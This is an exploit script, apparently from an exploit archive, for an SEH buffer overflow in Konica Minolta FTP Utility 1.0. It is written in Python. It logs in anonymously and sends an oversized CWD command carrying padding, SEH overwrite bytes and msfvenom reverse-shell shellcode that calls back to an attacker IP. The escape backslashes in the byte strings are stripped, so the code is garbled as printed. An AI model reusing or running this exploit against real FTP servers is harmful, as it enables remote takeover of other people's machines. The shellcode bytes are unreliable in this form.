Konica Minolta FTP Utility 1.0 SEH Buffer Overflow
Posted on 31 May 2016
import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) junk = "x41" * 1037 #offset to EIP #msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.41.55 LPORT=4444 -e x86/shikata_ga_nai -b "x00x0dx0ax3dx5cx2f" -i 3 -f python (replace LHOST with an attacker's IP) buf = "" buf += "xdbxd2xbfxccxeex99xa8xd9x74x24xf4x5dx2b" buf += "xc9xb1x5fx83xedxfcx31x7dx15x03x7dx15x2e" buf += "x1bx22x04x1bxadxccx8fxb3xf7x9bx0bxc7x56" buf += "x4dx9dx96x3fxbcx43xcdx3cx50x87xeex1cxbc" buf += "x9axa9xc8x34x1ax9cxbexb0x57x29xe3xb4x80" buf += "x3ax80x08xeex19xf4xd3xc7x43x35x0exb3x85" buf += "x74x16x36x51xc5xa5xe0x5bxf0x29x11x62x83" buf += "x56x98x21xeax69x23x10x7cx65x02x77x70xdc" buf += "x5axd9x6exc5x55x07x15xbaxb4x10xf5xeex73" buf += "xbcx17x68xe3x78x89x60x95x1cx62xbax1fx60" buf += "xd8x65x41xf7x0cx30x56x08x79xd2x32x0ex03" buf += "x56xbfx9exbfxf7xbaxe2xaax96x9dx1dx62xdd" buf += "xa7xbbx40x53xa2x0fxd8x25x4ax4ex4dx38xa9" buf += "xb6xb0x48x51xbax5ex6dx23x80xd4x45x61x14" buf += "x82xc4x6dx69x93x19x69xe9x8cx24x01xb5x68" buf += "xc4xfex95x69x0cxa1x71xd2x5dxb8x90x06x31" buf += "xfaxfexf8x61x35x46xc8xcbxf8x57xacx85x06" buf += "x2bx6dx02xb2x4bxcax0ex87xafx7dx43x6bx1c" buf += "x03x42x13xfex16x9cx70xf2xafx34x6ex42x2b" buf += "xbaxf2x62xdcx9ax55x4ax46x08x04x7ax8ex26" buf += "x95xa8x72x8ex8cx83xefxcdxb6x10x91xfexda" buf += "x3ax15xbax7cxefx24x1cx9dxb7x57xe9x60x7f" buf += "x06xd3xf6x7bx85x7bxd3xb2x8cx30x85xb7x56" buf += "x41x7fx6cxabx01x7ax1bx77xcfxd5x0cx85xce" buf += "xb6x6fx5fxfbxc7x43xc8x13xfexaexccxeaxe6" buf += "x40x61x2cx75xdbx9ax6bx03x80xc1x69xc8x5f" buf += "x16x31x16xf4x50x45x99xa9xc5x7fxa0x64x59" buf += "xb3x95xe1xb7xa6xe0x36x2axe3xc7xcbx09xb0" buf += "x84x37x67xa2x91xbdxb8x38x26x68xa8x67x81" buf += "x5ex89xf8xf3x30xd2xc2x37x25x2dx99xf2xad" buf += "x34xdfx21x2bx43xcdx18xa0x95x9exa9xe4x44" buf += "xb0xcd" nseh = "xebx10x90x90" seh = "xb0x63x20x12" exploit = junk + nseh + seh + "x90" *20 + buf + "x42" * 500 print "sending" s.connect(('x.x.x.x',21)) # Insert target IP data = s.recv(1024) s.send('USER anonymous' + ' ') data = s.recv(1024) s.send('PASS anonymous' + ' ') data = s.recv(1024) s.send('CWD ' +exploit+ ' ') s.close
